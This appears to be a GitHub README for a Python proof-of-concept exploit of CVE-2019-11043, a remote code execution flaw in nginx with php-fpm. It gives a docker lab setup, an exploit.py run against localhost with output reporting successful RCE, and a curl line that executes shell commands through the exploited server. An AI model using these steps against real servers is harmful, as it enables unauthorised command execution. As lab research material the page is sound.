PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit https://github.com/neex/phuip-fpizdam
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

theMiddleBlue/CVE-2019-11043

theMiddleBlue

Reviews

Repository Details

PoC CVE-2019-11043

PoC Setup

Exploit

Video PoC

More Repositories